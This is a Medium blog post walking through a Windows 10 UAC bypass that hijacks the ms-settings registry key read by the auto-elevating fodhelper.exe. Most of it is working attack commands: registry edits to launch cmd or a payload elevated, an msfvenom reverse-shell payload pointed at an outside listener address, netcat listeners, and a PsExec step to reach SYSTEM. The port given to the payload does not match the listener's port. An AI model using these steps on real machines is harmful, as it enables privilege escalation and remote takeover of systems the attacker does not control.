Sitemap
Open in app

Sign in

Medium Logo
Write
Search

Sign in

Using fodhelper to bypass UAC in Windows 10

3 min readSep 26, 2022

Users of Windows 10 environments can control language preferences for a number of Windows features, including text-to-speech and typing. A process with the name fodhelper.exe is launched whenever a user asks to open “Manage Optional Features” in Windows Settings to change the language. Due to its binary’s autoelevate setting being set to “true,” this process is operating with high integrity.

Check Permission

If we are in Medium Mandatory Level or High Mandatory Level group, we can use fodhelper to bypass UAC.

Manual Check Method

whoami /groups
Press enter or click to view image in full size

Using Tools

Sharpup.exe can be used to decide the possibility that UAC could be bypassed.

GitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)

You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

SharpUp.exe "audit"
Press enter or click to view image in full size

Step to bypass UAC with fodhelper.

Via RDP

  1. We run command following via powershell to Create Registry Structure.
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force

2. We run the command following via Powershell to add register property.

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

3. Run Fodhelper

fodhelper
Press enter or click to view image in full size

We’ll get cmd with Administrator Privilege.

Reverse Shell

We can reverse shell with UAC bypass.

  1. We use msfvenom to generate reverse.exe with reverse shell payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.214 LPORT=53 -f exe > reverse.exe
Press enter or click to view image in full size

2. We run command following via powershell to Create Registry Structure.

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value c:\users\public\reverse.exe -Force
Press enter or click to view image in full size

3. We run the command following via Powershell to add register property.

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
Press enter or click to view image in full size

4. We use nc to listen on port 443.

nc -lnvp 443

5. We run fodhelper.

fodhelper

6. We’ll get shell as 2bit.

Get shell as system.

We can using PsExec before bypass UAC to get shell as system.

  1. We use nc to listen on port 443.
nc -lnvp 443

2. Run the command following to execute reverse.exe with PsExec.

PsExec64.exe -accepteula -i -s C:\users\2bit\Documents\reverse.exe
Press enter or click to view image in full size

3. We get shell as ny authority\system

Windows Security
User Access Control
Privilege Escalation

--

--

GrimTheRipper
GrimTheRipper

Written by GrimTheRipper

32 followers
7 following

You get the best out of others when you give the best of yourself

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech